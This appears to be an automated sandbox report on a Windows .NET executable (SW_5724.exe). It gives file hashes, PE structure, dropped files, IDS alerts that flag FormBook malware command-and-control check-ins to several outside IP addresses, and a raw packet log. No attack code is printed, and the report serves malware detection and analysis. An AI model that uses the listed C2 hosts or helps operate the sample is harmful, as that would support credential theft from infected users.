                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):2232
                                                                                Entropy (8bit):5.380046556058007
                                                                                Encrypted:false
                                                                                SSDEEP:48:tWSU4xympgv4RIoUP7gZ9tK8NPZHUx7u1iMuge//Z9yus:tLHxv2IfLZ2KRH6OugQs
                                                                                MD5:DACB2D19CCFBAB625A2060875B8A45E6
                                                                                SHA1:FA7ED094A2F8F9FA0339CBE9BC146C1ACFB24D9F
                                                                                SHA-256:66FD1F81EEB5263995FB08102922F4285043BE2000D2D69BF1F1945604567D83
                                                                                SHA-512:AA2BE1B3E2E71C47BA0D4A3C6DD1F93C6D3E0F5E286B4B8BE279B036DA0FF6354AEE59AEF3CEB56B8C3C876B26936C5160D83A1989B2968F830A2C98C4AA2A0A
                                                                                Malicious:false
                                                                                Process:C:\Windows\SysWOW64\regini.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                Category:dropped
                                                                                Size (bytes):196608
                                                                                Entropy (8bit):1.121297215059106
                                                                                Encrypted:false
                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                Malicious:false
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Entropy (8bit):7.77502850329395
                                                                                TrID:
                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                File name:SW_5724.exe
                                                                                File size:814'592 bytes
                                                                                MD5:cf8c34b20f0e8654371c004272b4def6
                                                                                SHA1:1c81b7ac021345bd328e7cabee98979a1923d5b3
                                                                                SHA256:61890e63d7ba75eeccb7bf59ab004ab2aa94e463137a8fbb162d40921a8aa59f
                                                                                SHA512:2923eb6c6f248b0ace5b6ee8aed7c53f899645cc2c57fd2b2e1ce4538e9becc6b91500aa0b69009137633c96b36a57960787594599df5d69c94543162071b82b
                                                                                SSDEEP:12288:IYOSIR4R52J+XtG/EGHxCwnYxejZoCo391AMPWcZYI0G2YJMgbr17IrNA03pYIR:I5SIee//VXjytFZYI0GvJM6h7VI
                                                                                TLSH:8C05F19C3601F54FC91782314AB1ED74AA686DFE970782039AD72EEFF91DC568E041E2
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ng..............0......P.......:... ...@....@.. ....................................@................................
                                                                                Icon Hash:033424c4c199d839
                                                                                Entrypoint:0x4c3a2e
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x674EA0EF [Tue Dec 3 06:10:55 2024 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                Instruction
                                                                                jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc39d4 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x4ca8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xca000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xc1a34 | 0xc1c00 | a32acfab7953fe4fde2d526067f4c924 | False | 0.9089667338709677 | data | 7.776537038112395 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc4000 | 0x4ca8 | 0x4e00 | e512690c4b81eb5d1e6032bfe76feaae | False | 0.9410556891025641 | data | 7.769006923276508 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xca000 | 0xc | 0x200 | 0cb9c1c952bb8d561cb0886c96a694ae | False | 0.044921875 | data | 0.09409792566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc4130 | 0x46f9 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9932852661126094
RT_GROUP_ICON | 0xc882c | 0x14 | data | | | 1.05
RT_VERSION | 0xc8840 | 0x278 | data | | | 0.4699367088607595
RT_MANIFEST | 0xc8ab8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-03T14:21:34.946868+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49796 | 13.248.169.48 | 80 | TCP
2024-12-03T14:21:34.946868+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49796 | 13.248.169.48 | 80 | TCP
2024-12-03T14:21:51.778129+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49833 | 13.248.169.48 | 80 | TCP
2024-12-03T14:21:54.486783+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49839 | 13.248.169.48 | 80 | TCP
2024-12-03T14:21:57.111215+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49849 | 13.248.169.48 | 80 | TCP
2024-12-03T14:21:57.111215+0100 | 2856318 | ETPRO MALWARE FormBook CnC Checkin (POST) M4 | 1 | 192.168.2.5 | 49849 | 13.248.169.48 | 80 | TCP
2024-12-03T14:21:59.786006+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49855 | 13.248.169.48 | 80 | TCP
2024-12-03T14:21:59.786006+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49855 | 13.248.169.48 | 80 | TCP
2024-12-03T14:22:06.414414+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49871 | 84.32.84.32 | 80 | TCP
2024-12-03T14:22:09.083403+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49877 | 84.32.84.32 | 80 | TCP
2024-12-03T14:22:11.750739+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49883 | 84.32.84.32 | 80 | TCP
2024-12-03T14:22:14.455178+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49890 | 84.32.84.32 | 80 | TCP
2024-12-03T14:22:14.455178+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49890 | 84.32.84.32 | 80 | TCP
2024-12-03T14:22:21.420221+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49905 | 84.32.84.32 | 80 | TCP
2024-12-03T14:22:24.251577+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49913 | 84.32.84.32 | 80 | TCP
2024-12-03T14:22:26.834222+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49919 | 84.32.84.32 | 80 | TCP
2024-12-03T14:22:29.471163+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49927 | 84.32.84.32 | 80 | TCP
2024-12-03T14:22:29.471163+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49927 | 84.32.84.32 | 80 | TCP
2024-12-03T14:22:36.727816+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49943 | 209.74.77.107 | 80 | TCP
2024-12-03T14:22:39.404800+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49949 | 209.74.77.107 | 80 | TCP
2024-12-03T14:22:42.087413+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49955 | 209.74.77.107 | 80 | TCP
2024-12-03T14:22:44.685627+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49961 | 209.74.77.107 | 80 | TCP
2024-12-03T14:22:44.685627+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49961 | 209.74.77.107 | 80 | TCP
2024-12-03T14:22:51.858807+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49978 | 38.47.207.164 | 80 | TCP
2024-12-03T14:22:54.605716+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49985 | 38.47.207.164 | 80 | TCP
2024-12-03T14:22:57.262492+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49992 | 38.47.207.164 | 80 | TCP
2024-12-03T14:23:00.043567+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49998 | 38.47.207.164 | 80 | TCP
2024-12-03T14:23:00.043567+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49998 | 38.47.207.164 | 80 | TCP
2024-12-03T14:23:07.323412+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50004 | 208.115.225.220 | 80 | TCP
2024-12-03T14:23:09.944094+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50005 | 208.115.225.220 | 80 | TCP
2024-12-03T14:23:12.661850+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50006 | 208.115.225.220 | 80 | TCP
2024-12-03T14:23:15.314569+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50007 | 208.115.225.220 | 80 | TCP
2024-12-03T14:23:15.314569+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50007 | 208.115.225.220 | 80 | TCP
2024-12-03T14:23:30.937979+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50008 | 104.21.15.100 | 80 | TCP
2024-12-03T14:23:33.606470+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50009 | 104.21.15.100 | 80 | TCP
2024-12-03T14:23:36.278247+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50010 | 104.21.15.100 | 80 | TCP
2024-12-03T14:23:40.129216+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50011 | 104.21.15.100 | 80 | TCP
2024-12-03T14:23:40.129216+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50011 | 104.21.15.100 | 80 | TCP
2024-12-03T14:23:46.977862+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50012 | 199.59.243.227 | 80 | TCP
2024-12-03T14:23:49.565770+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50013 | 199.59.243.227 | 80 | TCP
2024-12-03T14:23:52.235340+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50014 | 199.59.243.227 | 80 | TCP
2024-12-03T14:23:55.178752+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50015 | 199.59.243.227 | 80 | TCP
2024-12-03T14:23:55.178752+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50015 | 199.59.243.227 | 80 | TCP
2024-12-03T14:24:02.157586+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50016 | 199.59.243.227 | 80 | TCP
2024-12-03T14:24:04.932428+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50017 | 199.59.243.227 | 80 | TCP
2024-12-03T14:24:07.523747+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50018 | 199.59.243.227 | 80 | TCP
2024-12-03T14:24:10.187099+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50019 | 199.59.243.227 | 80 | TCP
2024-12-03T14:24:10.187099+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50019 | 199.59.243.227 | 80 | TCP
2024-12-03T14:24:16.929560+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50020 | 172.67.156.195 | 80 | TCP
2024-12-03T14:24:19.664810+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50021 | 172.67.156.195 | 80 | TCP
2024-12-03T14:24:22.314364+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50022 | 172.67.156.195 | 80 | TCP
2024-12-03T14:24:25.018599+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50023 | 172.67.156.195 | 80 | TCP
2024-12-03T14:24:25.018599+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50023 | 172.67.156.195 | 80 | TCP
2024-12-03T14:24:32.351290+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50024 | 108.179.253.197 | 80 | TCP
2024-12-03T14:24:35.024724+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50025 | 108.179.253.197 | 80 | TCP
2024-12-03T14:24:37.768398+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50026 | 108.179.253.197 | 80 | TCP
2024-12-03T14:24:40.321300+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50027 | 108.179.253.197 | 80 | TCP
2024-12-03T14:24:40.321300+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50027 | 108.179.253.197 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                Dec 3, 2024 14:21:54.944880009 CET804983913.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:21:55.843718052 CET4984980192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:55.964013100 CET804984913.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:21:55.964131117 CET4984980192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:55.980192900 CET4984980192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:56.100338936 CET804984913.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:21:56.100811005 CET804984913.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:21:57.111102104 CET804984913.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:21:57.111215115 CET4984980192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:57.496434927 CET4984980192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:57.616585016 CET804984913.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:21:58.515603065 CET4985580192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:58.635752916 CET804985513.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:21:58.636363983 CET4985580192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:58.647058010 CET4985580192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:58.767405987 CET804985513.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:21:59.785680056 CET804985513.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:21:59.785928965 CET804985513.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:21:59.786005974 CET4985580192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:59.788594007 CET4985580192.168.2.513.248.169.48
                                                                                Dec 3, 2024 14:21:59.908669949 CET804985513.248.169.48192.168.2.5
                                                                                Dec 3, 2024 14:22:05.140866041 CET4987180192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:05.260977983 CET804987184.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:05.261244059 CET4987180192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:05.276699066 CET4987180192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:05.396975040 CET804987184.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:06.414292097 CET804987184.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:06.414413929 CET4987180192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:06.793483019 CET4987180192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:06.913554907 CET804987184.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:07.812544107 CET4987780192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:07.934233904 CET804987784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:07.934410095 CET4987780192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:07.950037956 CET4987780192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:08.071362972 CET804987784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:09.083290100 CET804987784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:09.083403111 CET4987780192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:09.465275049 CET4987780192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:09.585457087 CET804987784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:10.484421968 CET4988380192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:10.604552031 CET804988384.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:10.604737997 CET4988380192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:10.620232105 CET4988380192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:10.740849972 CET804988384.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:10.740869045 CET804988384.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:11.750617027 CET804988384.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:11.750739098 CET4988380192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:12.121557951 CET4988380192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:12.241777897 CET804988384.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:13.140645981 CET4989080192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:13.260807037 CET804989084.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:13.261102915 CET4989080192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:13.270989895 CET4989080192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:13.391251087 CET804989084.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:14.454948902 CET804989084.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:14.455003023 CET804989084.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:14.455014944 CET804989084.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:14.455137968 CET804989084.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:14.455153942 CET804989084.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:14.455178022 CET4989080192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:14.455219030 CET4989080192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:14.455267906 CET804989084.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:14.455308914 CET4989080192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:14.455317974 CET804989084.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:14.455331087 CET804989084.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:14.455342054 CET804989084.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:14.455353975 CET804989084.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:14.455372095 CET4989080192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:14.455393076 CET4989080192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:14.576814890 CET4989080192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:14.696849108 CET804989084.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:20.200191975 CET4990580192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:20.320647001 CET804990584.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:20.321557999 CET4990580192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:20.339613914 CET4990580192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:20.459624052 CET804990584.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:21.420160055 CET804990584.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:21.420221090 CET4990580192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:21.840348005 CET4990580192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:21.960318089 CET804990584.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:22.866818905 CET4991380192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:22.986752033 CET804991384.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:22.989584923 CET4991380192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:23.004879951 CET4991380192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:23.125092030 CET804991384.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:24.251370907 CET804991384.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:24.251576900 CET4991380192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:24.512343884 CET4991380192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:24.632491112 CET804991384.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:25.537456036 CET4991980192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:25.657639027 CET804991984.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:25.657731056 CET4991980192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:25.677642107 CET4991980192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:25.798988104 CET804991984.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:25.799186945 CET804991984.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:26.834130049 CET804991984.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:26.834222078 CET4991980192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:27.184247971 CET4991980192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:27.304874897 CET804991984.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:28.203182936 CET4992780192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:28.323343992 CET804992784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:28.325670004 CET4992780192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:28.337583065 CET4992780192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:28.457679033 CET804992784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:29.470979929 CET804992784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:29.471049070 CET804992784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:29.471062899 CET804992784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:29.471163034 CET4992780192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:29.471256971 CET804992784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:29.471292973 CET4992780192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:29.471302986 CET804992784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:29.471321106 CET804992784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:29.471334934 CET804992784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:29.471354008 CET4992780192.168.2.584.32.84.32
                                                                                Dec 3, 2024 14:22:29.471616983 CET804992784.32.84.32192.168.2.5
                                                                                Dec 3, 2024 14:22:29.471630096 CET804992784.32.84.32192.168.2.5
